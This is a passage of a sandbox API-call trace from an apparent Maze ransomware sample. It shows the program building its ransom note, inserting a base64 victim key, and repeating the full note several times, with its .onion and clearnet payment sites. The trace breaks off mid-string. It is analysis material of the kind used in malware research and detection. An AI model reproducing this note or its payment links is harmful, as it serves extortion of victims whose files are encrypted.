(lpString="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") returned 2564 [0051.697] StrStrW (lpFirst="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", lpSrch="%base64key%") returned="%base64key%\r\n---END MAZE KEY---\r\n\r\n" [0051.697] VirtualAlloc (lpAddress=0x0, dwSize=0x2416, flAllocationType=0x3000, flProtect=0x4) returned 0xf70000 [0051.697] lstrcpynW (in: lpString1=0xf70000, lpString2="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n", iMaxLength=2019 | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n" [0051.697] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n", lpString2="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" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n1ujMBzMtWcg3j3csHFRTbG1OlFICZ2fF0SGosgxjcchu1MDIMly7CBAb4B+bIIeacNA7gqH05ksgSzA1rko+JhzG1aEZOxLV3NYO5/EiAH4Kdwgx07IijKtjA5jxSXRm8yHP9wQ2l9ZNWGniP+Ni5QI0KZKq+Nu+Lm0xfW6xZlgQuJ7gAcARahMWVmOt0CQfcxWXZPx/vAHewaxheaoOi+B6+PBHxvXhL37U/Qpa+KS3uA4mtoYGeQ0pBJhdLI94GnMqjwxH8okQgxbR/diYd4HmSXPVJnAH45cWUxlwWHi17tPcZsNoupdks4kuppSnc4mjJ6fxGCs8Yh9IF4iPQzkJ9479qQUbSlPvw0Q4Wy2ufAlaEdKQKylpinkoykAH9haZuRzjQeLAZ6z2bE/kg2jDl2HXUp7vC3sp2c6dGQR7W7rNOyxIqOYr+K1y7k8OeCfjzkOrSwkdhjPPMdyRpM//AZ/Klo7xajKVRqEDd+HWQvQfdxutG90dsyaFsz4cOThvcqAKiko93ph1UlLusFoSDSoATUqhYbucHlsFyl3KiMgnENT232fraqUcgUPv6WMMwK3L/oU1bQR8gzPDrP9mfq4rpOdVr5Mm5OlL0BqKE9uG4eB8LL8PRqSXCn6xSnvXRelGPBV2M4iWCQ6fNdHlDBb8eYoGdWrmTf5ceGztp8iWOwAvIdTE0VDE/iZPwhbwFA9H58EEZcER9eZDOyPo57GhGD0QKkZrjkakRe+M+zXqRnLMe/FjU3mmx8v1BW1d2ETKGfw+KmeVPDVs36/oWXMh8GDvndaaM7+0zxA4kaLihe2VHwwZraBNH2A7P1jvFMqTaLzSRDyh4BDtHyp0RSyOARjaK9bnyzFqXldxL91VUtNBItsKZvO44rK/c2ENr+RO0a0djv1NsTIzqk0QVttVeMYWV/Kphx5aGKfv6c3RexlncEyJ+q5fabIcuE+yrqYk+AMMC1HHZAZQnJt8JEc7ObLZCFX7GMH8uUqRt4VY6rCTsVCC5Si4/UBR6LLjKBLHXuGVwLpUOrsJjj/3zZJHM08ezZC/uCMZKx6/8LQFz47DFYs3/kG0RvYzxMZcXTMVCZ91MhUfEYtxIaTWQ4/C4f9cgIhnBLbKZcXjBk76LWjAWhA/yRD2EyKi2iFcryMv+U3sVCaXhPjMNjB32Vga3NBtJ4lFrkr2j8D7lwXTJq7F6pqPAP3oRTNmH/em4xUX4Ifx9Y1Ee54/BfonTTd3V6SDG9swfJRm8IvoSOhIqwJbERSM1lb91BrQyNHUPc+ATkYuB3CHxa9h+rJZGaE/MaytdSkjSPZF8xCWBvqIhaLgu2TCMYdJrVtRZyEs+G8R7JzU1zppCj3TMjRisS0C5vcuT6p6npiTEVQZ0RjSFmp57a4onMw4hy7kO98H/yaJfa/9jvnuMg/yOrS/sE0fk7MQUn7QbOy4YVdfEURHMBuzF6RcyH08o7q71oflLpJmqDw5357A6mtWv052N8rpV9PnCXuf4D7I3aWEwb5kDkOg37+MQzcuamSeRMDDU4xKUfszFm99Se+7DU7KHgz/xS9OnreaGVvoyeD6Wo/+2ySbTiofDJ00u9w4pQ8carEc87DMDr6HSi7D0tB4qKfmlOwoeD+w